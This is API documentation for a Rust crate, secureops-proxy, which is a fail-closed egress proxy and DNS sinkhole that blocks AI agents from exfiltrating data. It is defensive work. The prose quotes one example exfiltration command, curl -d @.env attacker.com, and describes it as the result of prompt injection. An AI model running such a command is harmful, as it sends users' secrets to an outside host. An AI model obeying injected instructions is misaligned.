Crate secureops_proxy

Expand description

§secureops-proxy - the egress PEP (Policy Enforcement Point)

This crate is the single highest-impact enforcement component in SecureOps: it neutralizes data exfiltration regardless of how the agent was compromised (PRODUCT.md Part D headline, Part E P0). All outbound agent traffic is funneled through a local forward proxy and a local DNS sinkhole; each connection is authorized by the PDP ([secureops_policy]) before a single byte leaves the box.

§The headline path (PRODUCT.md B.5)

Agent (Ring 0) attempts an outbound connection. DNS goes to the local DnsSinkhole; raw connects are routed to the local EgressProxy (transparent redirect or explicit HTTPS_PROXY).
The proxy reads the SNI / requested host - no MITM, no certificate interception by default (see PeekedHost) - and asks the PDP: is this destination allowed for this process?
The PDP evaluates policy + accumulated per-PID process context (e.g. “this PID openat’d a credential file 200ms ago”) and returns Decision::Allow, Decision::Deny, or Decision::Escalate.
Deny => hard RST; the bytes never leave the box (0 bytes exfiltrated). Allow => the connection proceeds. Either way, exactly one entry is written to the signed audit log with the PID/host/decision attached.

Concretely, this turns the canonical prompt-injection exfil curl -d @.env attacker.com from “we’d have a log of it afterward” into “it didn’t happen” - the unknown host is hard-RST at the proxy (PRODUCT.md Part D, row 1).

§Fail-closed is the contract (PRODUCT.md W0)

The egress proxy + DNS sinkhole are the only cross-platform enforcement primitives (✓ on Linux/macOS/Windows). Kernel-level inline deny is uneven: Linux has LSM-BPF, macOS Endpoint Security is mostly observe-only, Windows uses a WFP callout. The subphase rule is therefore non-negotiable:

Where a platform can only observe, the daemon must fail-closed at the proxy rather than pretend it has kernel deny.

In this crate that means: any error, PDP timeout, PDP-unreachable, or unknown destination resolves to a hard RST / sinkholed answer - never to an open connection. See FailMode (defaults to FailMode::Closed) and EgressProxy::on_error.

Structs§

AllowlistPdp: A concrete, dependency-free PolicyDecisionPoint: allow a connection only when its host is in the egress allowlist (everything else denied - fail-closed). Mirrors secureops.network.egressAllowlist (PRODUCT.md B.3 network module / B.5).
ConnectionRequest: The per-connection context handed to the PDP: who is asking, and for what.
DnsSinkhole: Local DNS authority that swallows lookups for disallowed / unknown names.
EgressProxy: Local forward proxy that authorizes every outbound agent connection.
PeekedHost: What the proxy peeked off the wire to identify the destination, without MITM (PRODUCT.md B.5 step 2: “no MITM, no cert interception by default”).

Enums§

Decision: The PDP’s verdict for a single egress attempt (PRODUCT.md B.5 step 3).
EnforcementTier: The platform’s enforcement tier, so operators don’t over-trust a weaker OS (PRODUCT.md W0 table). The proxy itself is cross-platform; what differs is whether kernel deny backs it up.
FailMode: How the PEP behaves when it cannot get a definitive Allow (PDP error/timeout, observe-only platform, malformed handshake, …).

Traits§

PolicyDecisionPoint: The slice of secureops-policy’s PDP that the egress PEP requires.

Functions§

egress_finding: Build the [AuditFinding] recorded for a single egress decision.
handle_connection: Handle one proxied connection: read the HTTP CONNECT request, ask the PDP, and either tunnel to the upstream (Decision::Allow) or refuse with 403 without ever contacting the upstream (Deny/Escalate → 0 bytes leave - PRODUCT.md B.5 step 4 / Part D row 1). Fail-closed on any error (W0).